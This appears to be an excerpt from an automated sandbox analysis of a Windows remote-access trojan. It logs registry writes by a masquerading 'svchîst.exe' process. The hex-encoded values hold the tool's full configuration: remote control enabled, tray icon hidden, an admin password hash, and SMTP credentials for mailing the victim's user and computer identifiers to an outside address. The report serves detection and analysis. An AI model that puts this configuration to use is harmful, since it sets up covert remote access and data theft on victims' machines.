Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
